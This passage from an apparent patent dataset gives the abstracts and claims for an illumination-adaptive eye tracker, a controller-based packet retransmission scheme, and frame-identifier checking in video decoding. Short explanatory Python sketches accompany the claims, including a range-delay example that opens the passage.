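        self.write_ptr = (self.write_ptr + 1) % self.size
        return out


# Illustrative assumption: how many delay samples correspond to 1 km of
# range change (the real mapping depends on sample rate and propagation).
SAMPLES_PER_KM = 10


def modify_range(rx_buf, tx_buf, max_range_km, reduce_by_km):
    """Decrease the range from its maximum extension (claims 1, 3, 11):
    the first delay goes in the receiver buffer, the second (equal)
    delay in the transmitter buffer, both corresponding to the amount."""
    amount = reduce_by_km * SAMPLES_PER_KM
    rx_buf.set_delay(amount)  # first delay
    tx_buf.set_delay(amount)  # second delay
    return max_range_km - reduce_by_km
```

Keeping the receiver-side and transmitter-side delays equal mirrors the claims' requirement that both the first and second delay correspond to the same first amount, so uplink and downlink timing shift together.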
9,156 | 9,156 | 14,708,573 | 2,483 | An eye tracking apparatus is operable in both first and second illumination environments where the second illumination is associated with a higher illumination environment than the first illumination. The apparatus includes an image capturer configured to capture an image of a user, an image processor configured to detect an eyepoint of the user in the captured image, and an optical source configured to emit infrared light to the user in a first illumination mode. The image capturer includes a dual bandpass filter configured to allow infrared light and visible light to pass. | 1. An eye tracking apparatus, comprising:
an image capturer configured to capture an image of a user; an image processor configured to detect an eyepoint of the user in the captured image; and a controller configured to determine an operating mode based on an ambient illumination and control an operation of at least one of the image capturer and the image processor based on the determined operating mode, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode. 2. The apparatus of claim 1, wherein the controller is configured to determine the operating mode by comparing the ambient illumination to a threshold value. 3. The apparatus of claim 1, further comprising:
an optical source configured to emit infrared light to the user in the first illumination mode. 4. The apparatus of claim 3, wherein the optical source is configured to emit near-infrared light within a center of 850 nanometers (nm) and a bandwidth of 100 nm to the user in the first illumination mode. 5. The apparatus of claim 1, wherein the image capturer comprises:
a dual bandpass filter configured to allow visible light and infrared light to pass. 6. The apparatus of claim 5, wherein the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and near-infrared light within a wavelength of 800 nm to 900 nm to pass. 7. The apparatus of claim 1, wherein the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a first database, the first database including visible images in the second illumination mode, and
the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a second database, the second database including infrared images in the first illumination mode. 8. The apparatus of claim 7, wherein the image capturer further comprises:
an image corrector configured to correct the captured image, and the image corrector is configured to perform demosaicing on the captured image in the second illumination mode. 9. An image capturing apparatus, comprising:
a controller configured to determine an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; an optical source configured to emit infrared light to a target area in the first illumination mode; a dual bandpass filter configured to allow infrared light and visible light to pass; an image sensor configured to generate an image by receiving light filtered by the dual bandpass filter; and an image corrector configured to correct the generated image. 10. The apparatus of claim 9, wherein the optical source is configured to emit near-infrared light within a center of 850 nm and a bandwidth of 100 nm, and
the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and infrared light within a wavelength of 800 nm to 900 nm to pass. 11. The apparatus of claim 9, wherein the image corrector is configured to perform demosaicing on the generated image in the second illumination mode. 12. An eye tracking method, comprising:
determining an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; capturing an image of a user based on the determined operating mode; and detecting an eyepoint of the user in the captured image. 13. The method of claim 12, further comprising:
emitting infrared light to the user in the first illumination mode. 14. The method of claim 12, wherein the capturing is based on reflected light passing through a dual bandpass filter configured to allow visible light and infrared light to pass. 15. The method of claim 12, wherein the capturing includes,
capturing a visible image of the user in the second illumination mode, and capturing an infrared image of the user in the first illumination mode. 16. The method of claim 12, wherein the detecting uses a feature point from a first database including visible images in the second illumination mode. 17. The method of claim 12, wherein the detecting uses a feature point from a second database including infrared images in the first illumination mode. 18. The method of claim 12, further comprising:
demosaicing the captured image in the second illumination mode. | An eye tracking apparatus is operable in both first and second illumination environments where the second illumination is associated with a higher illumination environment than the first illumination. The apparatus includes an image capturer configured to capture an image of a user, an image processor configured to detect an eyepoint of the user in the captured image, and an optical source configured to emit infrared light to the user in a first illumination mode. The image capturer includes a dual bandpass filter configured to allow infrared light and visible light to pass.1. An eye tracking apparatus, comprising:
an image capturer configured to capture an image of a user; an image processor configured to detect an eyepoint of the user in the captured image; and a controller configured to determine an operating mode based on an ambient illumination and control an operation of at least one of the image capturer and the image processor based on the determined operating mode, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode. 2. The apparatus of claim 1, wherein the controller is configured to determine the operating mode by comparing the ambient illumination to a threshold value. 3. The apparatus of claim 1, further comprising:
an optical source configured to emit infrared light to the user in the first illumination mode. 4. The apparatus of claim 3, wherein the optical source is configured to emit near-infrared light within a center of 850 nanometers (nm) and a bandwidth of 100 nm to the user in the first illumination mode. 5. The apparatus of claim 1, wherein the image capturer comprises:
a dual bandpass filter configured to allow visible light and infrared light to pass. 6. The apparatus of claim 5, wherein the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and near-infrared light within a wavelength of 800 nm to 900 nm to pass. 7. The apparatus of claim 1, wherein the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a first database, the first database including visible images in the second illumination mode, and
the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a second database, the second database including infrared images in the first illumination mode. 8. The apparatus of claim 7, wherein the image capturer further comprises:
an image corrector configured to correct the captured image, and the image corrector is configured to perform demosaicing on the captured image in the second illumination mode. 9. An image capturing apparatus, comprising:
a controller configured to determine an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; an optical source configured to emit infrared light to a target area in the first illumination mode; a dual bandpass filter configured to allow infrared light and visible light to pass; an image sensor configured to generate an image by receiving light filtered by the dual bandpass filter; and an image corrector configured to correct the generated image. 10. The apparatus of claim 9, wherein the optical source is configured to emit near-infrared light within a center of 850 nm and a bandwidth of 100 nm, and
the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and infrared light within a wavelength of 800 nm to 900 nm to pass. 11. The apparatus of claim 9, wherein the image corrector is configured to perform demosaicing on the generated image in the second illumination mode. 12. An eye tracking method, comprising:
determining an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; capturing an image of a user based on the determined operating mode; and detecting an eyepoint of the user in the captured image. 13. The method of claim 12, further comprising:
emitting infrared light to the user in the first illumination mode. 14. The method of claim 12, wherein the capturing is based on reflected light passing through a dual bandpass filter configured to allow visible light and infrared light to pass. 15. The method of claim 12, wherein the capturing includes,
capturing a visible image of the user in the second illumination mode, and capturing an infrared image of the user in the first illumination mode. 16. The method of claim 12, wherein the detecting uses a feature point from a first database including visible images in the second illumination mode. 17. The method of claim 12, wherein the detecting uses a feature point from a second database including infrared images in the first illumination mode. 18. The method of claim 12, further comprising:
demosaicing the captured image in the second illumination mode. | 2,400 |
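The controller logic running through the eye-tracking claims above — compare the ambient illumination to a threshold (claim 2), select the first (low-light, infrared) or second (bright, visible) illumination mode, and let that choice drive the optical source, the feature-point database, and whether demosaicing is applied — can be sketched as below. The threshold value and all names are illustrative assumptions, not values from the patent.

```python
FIRST_MODE = "infrared"   # low-light: IR source on, infrared feature database
SECOND_MODE = "visible"   # bright: IR source off, visible database, demosaic

# Assumed threshold for illustration only; the claims leave the value open.
ILLUMINATION_THRESHOLD_LUX = 50.0


def determine_mode(ambient_lux):
    """Claim 2: determine the operating mode by comparing the ambient
    illumination to a threshold value."""
    if ambient_lux >= ILLUMINATION_THRESHOLD_LUX:
        return SECOND_MODE
    return FIRST_MODE


def configure_pipeline(mode):
    """Per-mode settings implied by claims 3, 7 and 8: the IR source emits
    only in the first mode, the second database (infrared images) serves the
    first mode, and demosaicing runs only on second-mode visible captures."""
    if mode == FIRST_MODE:
        return {"ir_source": True, "database": "infrared", "demosaic": False}
    return {"ir_source": False, "database": "visible", "demosaic": True}
```

A single dual bandpass filter (visible 350–650 nm plus near-infrared 800–900 nm, per claim 6) is what lets one image sensor serve both branches of this mode switch without a mechanical filter change.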
9,157 | 9,157 | 16,047,496 | 2,463 | Systems and computer program products for performing retransmission of data packets over a network. A node receives a data packet with a source and a destination address. The data packet is sent along a network path to the destination address, and information associated with the data packet is sent to a controller node that is independent of the network path. A controller receives information associated with a data packet from any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths. An indication of a receipt acknowledgement for the data packet is received from a second forwarder node that is separate from the first forwarder node and the controller node. The receipt acknowledgement is correlated with the data packet and based on the correlating, data associated with retransmission processing of the data packet is deleted. | 1. A network forwarder node, comprising:
a receiver that, when operating:
receives a data packet with a source address and a destination address, the network forwarder node being separate from a source node with the source address and separate from a destination node with the destination address; and
identifies a data packet type of the data packet;
a packet transmitter that, when operating, sends the data packet along a network path to the destination node; and a controller communications interface that, when operating, sends to a controller node that is separate from the network forwarder node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 2. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further defines, based on the data packet type, the information associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 3. The network forwarder node of claim 1, wherein the information associated with the data packet comprises at least a portion of the data packet. 4. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further selects components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 5. The network forwarder node of claim 4, wherein the subset comprises only information to identify the data packet for correlation of a receipt acknowledgement with the data packet. 6. The network forwarder node of claim 1, further comprising a cache controller that, when operating:
stores at least a portion of the data packet into a data storage; deletes, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and resends, based on a retransmission instruction from the controller node, the at least the portion of the data packet to the destination node. 7. The network forwarder node of claim 6, wherein the cache controller, when operating, further receives a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. 8. The network forwarder node of claim 1, wherein the receiver, when operating, identifies the data packet type by at least determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 9. A controller node, comprising:
a processor; a memory, communicatively coupled to the processor; a receiver, communicatively coupled to the processor and memory, that, when operating:
receives information identifying a data packet from a first forwarder node, the first forwarder node being any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths, the first forwarder node forwarding the data packet to a destination node via a first communications path, each forwarder node further communicating with the controller node;
receives, from a second forwarder node subsequent to receiving the information, an indication of a receipt acknowledgement for the data packet that is received by the second forwarder node, the second forwarder node communicating with the destination node via a different communications path than the first communications path; and
a message cache controller, communicatively coupled to the processor, the memory, and the receiver, that, when operating:
correlates the indication of the receipt acknowledgement with the data packet; and
based on correlating the indication of the receipt acknowledgment with the data packet, deletes data associated with retransmission processing of the data packet. 10. The controller node of claim 9, wherein the first forwarder node and the second forwarder node are separate from one another,
wherein the first forwarder node monitors a first communications path, and wherein the second forwarder node monitors a second communications path, the first communications path and the second communications path each comprising independent, alternative communications paths of a communications channel communicatively coupling a source node and the destination node. 11. The controller node of claim 9, wherein the second forwarder node is separate from the first forwarder node and the controller node. 12. The controller node of claim 9, the message cache controller, when operating, further:
determines, after an acknowledgement timeout time interval, a lack of an indication of a receipt acknowledgment for the data packet; and based on determining the lack of the indication, causes transmission of a retransmission packet corresponding to the data packet. 13. The controller node of claim 12,
wherein the information associated with the data packet comprises identification information for the data packet, and wherein the message cache controller causes retransmission of the retransmission packet by at least instructing the first forwarder node to send the retransmission packet. 14. The controller node of claim 12,
wherein the information associated with the data packet comprises data packet addressing data and data packet payload data contained within the data packet, and wherein the message cache controller, when operating, further:
stores the information associated with the data packet; and
creates, based on determining the acknowledgement timeout time interval, the retransmission packet, and
wherein the message cache controller causes retransmission of the retransmission packet by at least transmitting the retransmission packet to a destination node specified for the data packet. 15. A computer program product for operating a network node, the computer program product comprising:
a storage medium readable by a processing circuit and storing instructions for execution by the processing circuit for performing a method comprising: receiving, at a network node, a data packet with a source address and a destination address, the network node being separate from a source node with the source address and separate from a destination node with the destination address; sending the data packet along a network path to the destination node; identifying a data packet type of the data packet; and sending to a controller node that is separate from the network node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 16. The computer program product of claim 15, wherein identifying the data packet type comprises determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 17. The computer program product of claim 15, the method further comprising defining, based on the data packet type, the information associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 18. The computer program product of claim 15, the method further comprising selecting components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 19. The computer program product of claim 15, the method further comprising:
storing at least a portion of the data packet into a data storage; deleting, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and
resending, based on a retransmission instruction from the controller, the at least the portion of the data packet to the destination node. 20. The computer program product of claim 16, the method further comprising receiving a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. | Systems and computer program products for performing retransmission of data packets over a network. A node receives a data packet with a source and a destination address. The data packet is sent along a network path to the destination address, and information associated with the data packet is sent to a controller node that is independent of the network path. A controller receives information associated with a data packet from any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths. An indication of a receipt acknowledgement for the data packet is received from a second forwarder node that is separate from the first forwarder node and the controller node. The receipt acknowledgement is correlated with the data packet and based on the correlating, data associated with retransmission processing of the data packet is deleted.1. A network forwarder node, comprising:
a receiver that, when operating:
receives a data packet with a source address and a destination address, the network forwarder node being separate from a source node with the source address and separate from a destination node with the destination address; and
identifies a data packet type of the data packet;
a packet transmitter that, when operating, sends the data packet along a network path to the destination node; and a controller communications interface that, when operating, sends to a controller node that is separate from the network forwarder node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 2. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further defines, based on the data packet type, the information associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 3. The network forwarder node of claim 1, wherein the information associated with the data packet comprises at least a portion of the data packet. 4. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further selects components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 5. The network forwarder node of claim 4, wherein the subset comprises only information to identify the data packet for correlation of a receipt acknowledgement with the data packet. 6. The network forwarder node of claim 1, further comprising a cache controller that, when operating:
stores at least a portion of the data packet into a data storage; deletes, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and resends, based on a retransmission instruction from the controller node, the at least the portion of the data packet to the destination node. 7. The network forwarder node of claim 6, wherein the cache controller, when operating, further receives a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. 8. The network forwarder node of claim 1, wherein the receiver, when operating, identifies the data packet type by at least determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 9. A controller node, comprising:
a processor; a memory, communicatively coupled to the processor; a receiver, communicatively coupled to the processor and memory, that when operating:
receives information identifying a data packet from a first forwarder node, the first forwarder node being any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths, the first forwarder node forwarding the data packet to a destination node via a first communications path, each forwarder node further communicating with the controller node;
receives, from a second forwarder node subsequent to receiving the information, an indication of a receipt acknowledgement for the data packet that is received by the second forwarder node, and the second forwarder node communicating with the destination node via a different communication path than the first communications path; and
a message cache controller, communicatively coupled to the processor, the memory, and the receiver, that when operating:
correlates the indication of the receipt acknowledgement with the data packet; and
based on correlating the indication of the receipt acknowledgment with the data packet, deletes data associated with retransmission processing of the data packet. 10. The controller node of claim 9, wherein the first forwarder node and the second forwarder node are separate from one another,
wherein the first forwarder node monitors a first communications path, and wherein the second forwarder node monitors a second communications path, the first communications path and the second communications path each comprising independent, alternative communications paths of a communications channel communicatively coupling a source node and the destination node. 11. The controller node of claim 9, wherein the second forwarder node is separate from the first forwarder node and the controller node. 12. The controller node of claim 9, the message cache controller, when operating, further:
determines, after an acknowledgement timeout time interval, a lack of an indication of a receipt acknowledgment for the data packet; and based on determining the lack of the indication, causes transmission of a retransmission packet corresponding to the data packet. 13. The controller node of claim 12,
wherein the information associated with the data packet comprises identification information for the data packet, and wherein the messaging cache controller causes retransmission of the retransmission packet by at least instructing the first forwarder node to send the retransmission packet. 14. The controller node of claim 12,
wherein the information associated with the data packet comprises data packet addressing data and data packet payload data contained within the data packet, and wherein the message cache controller, when operating, further:
stores the information associated with the data packet; and
creates, based on determining the acknowledgement timeout time interval, the retransmission packet, and
wherein the messaging cache controller causes retransmission of the retransmission packet by at least transmitting the retransmission packet to a destination node specified for the data packet. 15. A computer program product for operating a network node, the computer program product comprising:
a storage medium readable by a processing circuit and storing instructions for execution by the processing circuit for performing a method comprising: receiving, at a network node, a data packet with a source address and a destination address, the network node being separate from a source node with the source address and separate from a destination node with the destination address; sending the data packet along a network path to the destination node; identifying a data packet type of the data packet; and sending to a controller node that is separate from the network node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 16. The computer program product of claim 15, wherein identifying the data packet type comprises determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 17. The computer program product of claim 15, the method further comprising defining, based on the data packet type, the information associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 18. The computer program product of claim 15, the method further comprising selecting components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 19. The computer program product of claim 15, the method further comprising:
storing at least a portion of the data packet into a data storage; deleting, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and
resending, based on a retransmission instruction from the controller, the at least the portion of the data packet to the destination node. 20. The computer program product of claim 16, the method further comprising receiving a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. | 2,400 |
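The controller-node behavior in claims 9 through 14 above can be sketched briefly. The names below (`ControllerNode`, `on_packet_info`, `on_ack`, `expired`) are illustrative assumptions, not terms from the patent: a controller caches retransmission state for packets reported by a first forwarder node, deletes that state when a second forwarder node reports a matching receipt acknowledgement, and flags packets whose acknowledgement timeout has elapsed for retransmission.

```python
# Hypothetical sketch of the controller node in claims 9-14 (all identifiers
# are illustrative; the claims do not specify an implementation).
import time


class ControllerNode:
    def __init__(self, ack_timeout=1.0):
        self.ack_timeout = ack_timeout
        # packet_id -> (payload, arrival timestamp, reporting forwarder node)
        self.pending = {}

    def on_packet_info(self, packet_id, payload, forwarder):
        """First forwarder node reports a packet it forwarded along its path."""
        self.pending[packet_id] = (payload, time.monotonic(), forwarder)

    def on_ack(self, packet_id):
        """Second forwarder node reports a receipt acknowledgement: correlate
        it with the data packet and delete the retransmission state."""
        return self.pending.pop(packet_id, None) is not None

    def expired(self, now=None):
        """Packet IDs whose acknowledgement timeout interval elapsed and which
        therefore need retransmission (claim 12)."""
        now = time.monotonic() if now is None else now
        return [pid for pid, (_, t, _) in self.pending.items()
                if now - t > self.ack_timeout]
```

Note that the second forwarder node is deliberately distinct from the first (claim 11): the acknowledgement may travel back over a different communications path, so only the controller, which sits outside both paths, can correlate the two events.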
9,158 | 9,158 | 15,377,620 | 2,481 | Video data is received at a decoding device. An encoded first frame of the video data is received with a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier. An encoded second frame of the video data is also received with at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location. This allows the decoding device to check that the correct reference frame for decoding the second frame is stored thereat. Corresponding encoding operations are also disclosed. | 1. A method of decoding encoded video data at a decoding device, the method comprising, at the decoding device:
receiving an encoded first frame of the video data and a current frame description of the encoded video data for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description of the encoded video data for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. 2. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the decoding device generates at least one loss concealment frame to replace the second frame. 3. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the receiving device transmits a lost reference frame notification via a feedback channel to a transmitting device from which the video data is received. 4. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID length indicator that identifies a length of the frame identifier in that frame description. 5. A method according to claim 4, wherein the decoding device uses the frame ID length indicator to extract the frame identifier from that frame description. 6. A method according to claim 4, wherein the frame identifier has a length equal to a sum of the frame ID length indicator and a predetermined constant. 7. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID present flag, wherein the comparing step is conditional on the frame ID present flag indicating the presence of the frame identifier in that frame description. 8. A method according to claim 1, wherein the frames and the frame descriptions are received in an encoded bit stream, the frame description forming header data of the encoded bit stream. 9. A method according to claim 8, wherein the frame identifiers are included in an uncompressed portion of the header data. 10. A method according to claim 8, wherein the storage location indicators in the current and reference frame descriptions conform to the VP9 Specification. 11. A method according to claim 1, wherein the encoded video data is received at the decoding device from a transmitting device via a network. 12. A method according to claim 4, wherein the frame ID length indicator is received at the decoding device in a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions received for a sequence of encoded frames of the video data, each of those frame descriptions comprising a frame identifier having a length indicated thereby. 13. A method according to claim 12, wherein the sequence description and the multiple frame descriptions are received in a superframe comprising the sequence of encoded video frames, in which the sequence description is carried in a superframe syntax structure of the superframe and the frame descriptions are conveyed in frame header data associated with each coded frame. 14. An encoding device comprising a data interface configured to receive video data to be encoded and an encoder configured to implement steps of:
encoding a first frame of the video data; generating a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; encoding at least a portion of a second frame of the video data using inter-frame encoding with the first frame as a reference frame; generating at least one reference frame description for the second frame comprising: an identifier of the first frame, and an indicator of said storage location at the receiving device for the first frame and its frame identifier; and wherein the encoder is configured to output, as encoded video data, the encoded frames, the frame descriptions and, in association with at least one of the frame descriptions: a frame ID repetition flag, which indicates a uniqueness type for the frame identifier in that frame description, and/or a frame ID length indicator that identifies a length of the frame identifier in that frame description. 15. An encoding device according to claim 14, wherein the frame ID repetition flag indicates a first or a second uniqueness type, wherein frame identifiers having the first uniqueness type and a length l are restricted to being unique within any sequence of 2^l of such frame identifiers in the encoded video data, wherein the second uniqueness type is such that said restriction does not apply. 16. An encoding device according to claim 14, wherein the frame ID repetition flag and/or the frame ID length indicator form at least part of a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions for a sequence of video frames in the encoded video data, each of those frame descriptions comprising a frame identifier having a length and/or a uniqueness type indicated thereby. 17. 
An encoding device according to claim 16, wherein the sequence description and the multiple frame descriptions form part of a superframe of the encoded video data, in which the sequence description is carried in a superframe syntax structure and the frame descriptions are conveyed in frame header data associated with each coded frame. 18. An encoding device according to claim 14, wherein the encoding device comprises a communications interface configured to transmit the frame descriptions, and the frame ID repetition flag and/or the frame ID length indicator to a receiving device via a network in a sequence of RTP payloads. 19. An encoding device according to claim 14, wherein the frame identifiers are transmitted as absolute values. 20. A computer program product comprising code stored on a computer readable storage medium and configured when executed at a decoding device to implement the following steps:
receiving an encoded first frame of video data and a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. | Video data is received at a decoding device. An encoded first frame of the video data is received with a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier. An encoded second frame of the video data is also received with at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location. This allows the decoding device to check that the correct reference frame for decoding the second frame is stored thereat. Corresponding encoding operations are also disclosed.1. A method of decoding encoded video data at a decoding device, the method comprising, at the decoding device:
receiving an encoded first frame of the video data and a current frame description of the encoded video data for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description of the encoded video data for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. 2. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the decoding device generates at least one loss concealment frame to replace the second frame. 3. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the receiving device transmits a lost reference frame notification via a feedback channel to a transmitting device from which the video data is received. 4. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID length indicator that identifies a length of the frame identifier in that frame description. 5. A method according to claim 4, wherein the decoding device uses the frame ID length indicator to extract the frame identifier from that frame description. 6. A method according to claim 4, wherein the frame identifier has a length equal to a sum of the frame ID length indicator and a predetermined constant. 7. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID present flag, wherein the comparing step is conditional on the frame ID present flag indicating the presence of the frame identifier in that frame description. 8. A method according to claim 1, wherein the frames and the frame descriptions are received in an encoded bit stream, the frame description forming header data of the encoded bit stream. 9. A method according to claim 8, wherein the frame identifiers are included in an uncompressed portion of the header data. 10. A method according to claim 8, wherein the storage location indicators in the current and reference frame descriptions conform to the VP9 Specification. 11. A method according to claim 1, wherein the encoded video data is received at the decoding device from a transmitting device via a network. 12. A method according to claim 4, wherein the frame ID length indicator is received at the decoding device in a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions received for a sequence of encoded frames of the video data, each of those frame descriptions comprising a frame identifier having a length indicated thereby. 13. A method according to claim 12, wherein the sequence description and the multiple frame descriptions are received in a superframe comprising the sequence of encoded video frames, in which the sequence description is carried in a superframe syntax structure of the superframe and the frame descriptions are conveyed in frame header data associated with each coded frame. 14. An encoding device comprising a data interface configured to receive video data to be encoded and an encoder configured to implement steps of:
encoding a first frame of the video data; generating a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; encoding at least a portion of a second frame of the video data using inter-frame encoding with the first frame as a reference frame; generating at least one reference frame description for the second frame comprising: an identifier of the first frame, and an indicator of said storage location at the receiving device for the first frame and its frame identifier; and wherein the encoder is configured to output, as encoded video data, the encoded frames, the frame descriptions and, in association with at least one of the frame descriptions: a frame ID repetition flag, which indicates a uniqueness type for the frame identifier in that frame description, and/or a frame ID length indicator that identifies a length of the frame identifier in that frame description. 15. An encoding device according to claim 14, wherein the frame ID repetition flag indicates a first or a second uniqueness type, wherein frame identifiers having the first uniqueness type and a length l are restricted to being unique within any sequence of 2^l of such frame identifiers in the encoded video data, wherein the second uniqueness type is such that said restriction does not apply. 16. An encoding device according to claim 14, wherein the frame ID repetition flag and/or the frame ID length indicator form at least part of a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions for a sequence of video frames in the encoded video data, each of those frame descriptions comprising a frame identifier having a length and/or a uniqueness type indicated thereby. 17. 
An encoding device according to claim 16, wherein the sequence description and the multiple frame descriptions form part of a superframe of the encoded video data, in which the sequence description is carried in a superframe syntax structure and the frame descriptions are conveyed in frame header data associated with each coded frame. 18. An encoding device according to claim 14, wherein the encoding device comprises a communications interface configured to transmit the frame descriptions, and the frame ID repetition flag and/or the frame ID length indicator to a receiving device via a network in a sequence of RTP payloads. 19. An encoding device according to claim 14, wherein the frame identifiers are transmitted as absolute values. 20. A computer program product comprising code stored on a computer readable storage medium and configured when executed at a decoding device to implement the following steps:
receiving an encoded first frame of video data and a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. | 2,400 |
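The decoder-side check in claim 1 of this record amounts to a tagged reference-frame buffer: each decoded frame is stored together with its frame identifier at the slot named by the current frame description, and before inter-frame decoding the slot named by the reference frame description is verified against the expected identifier. The sketch below is an illustration under assumed names (`ReferenceFrameBuffer`, `store`, `lookup`); the claims do not prescribe this structure.

```python
# Illustrative sketch of the frame-identifier check in claim 1; a mismatch at
# lookup time corresponds to the loss-concealment / feedback cases of
# claims 2-3.

class ReferenceFrameBuffer:
    def __init__(self, num_slots=8):
        # slot index -> (frame identifier, decoded frame data), or None
        self.slots = [None] * num_slots

    def store(self, slot, frame_id, frame):
        """Store a decoded frame and its identifier at the storage location
        indicated in the current frame description."""
        self.slots[slot] = (frame_id, frame)

    def lookup(self, slot, expected_frame_id):
        """Use the indicator in the reference frame description to access the
        slot, compare identifiers, and return the reference frame only on a
        match; None signals a lost or overwritten reference frame."""
        entry = self.slots[slot]
        if entry is None or entry[0] != expected_frame_id:
            return None
        return entry[1]
```

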